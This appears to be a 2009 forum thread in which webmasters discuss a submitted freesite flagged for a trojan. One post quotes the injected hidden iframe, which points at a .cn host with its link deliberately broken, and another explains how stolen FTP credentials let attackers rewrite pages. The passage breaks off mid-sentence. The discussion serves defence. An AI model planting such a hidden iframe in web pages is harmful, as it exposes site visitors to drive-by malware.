Greenguy's Board - Trojan on freesite

Greenguy's Board (http://www.greenguysboard.com/board/index.php)

- Possible Cheaters (http://www.greenguysboard.com/board/forumdisplay.php?f=19)

- - Trojan on freesite (http://www.greenguysboard.com/board/showthread.php?t=53197)

hincapie

2009-06-16 11:28 AM

Trojan on freesite

I was checking some freesites submitted to me - and this one made my trojan alerter go nuts: http://paintortures.com/16-06/

Take care

Wazza

2009-06-16 03:38 PM

It is the main page that is the issue

Contains the following

Code:

iframe src="http://meldor[inserted to kill link]group.cn:8080/ts/in.cgi?pepsi67" width=125 height=125 style="visibility: hidden"

The wms ref code is

slavesinlove.com/cgi-bin/click.cgi?id=dejavu

I know I've seen dejavu before...

cd34	2009-06-16 03:47 PM

iframe after -- ftp account was most likely compromised.

Wazza

2009-06-16 04:00 PM

Odd that it's not on all html pages... the index is clean... but the main page, the one that is less likely to get scanned by a linkbot has the code...

nate	2009-06-16 09:11 PM

Quote:

ftp account was most likely compromised.

you say that a lot. why so?

cd34	2009-06-16 09:56 PM

Quote:

Originally Posted by nate (Post 454442)

you say that a lot. why so?

There are a few types of exploits that are out there. A web exploit or an FTP exploit are the two most common.

With the FTP exploit, a person's FTP user/password data is compromised and passed off to a cluster of machines. Those machines then go in with the FTP credentials and download every .html and .php file and replace with